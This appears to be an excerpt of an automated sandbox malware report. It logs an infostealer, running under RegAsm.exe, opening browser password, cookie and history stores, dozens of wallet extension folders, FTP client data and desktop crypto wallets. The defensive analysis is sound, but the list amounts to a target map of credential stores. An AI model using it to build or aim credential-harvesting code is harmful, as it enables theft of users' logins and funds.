Source: RegAsm.exe, 00000008.00000002.1937052782.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: powershell.exe, 00000005.00000002.1746644173.00000000079E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
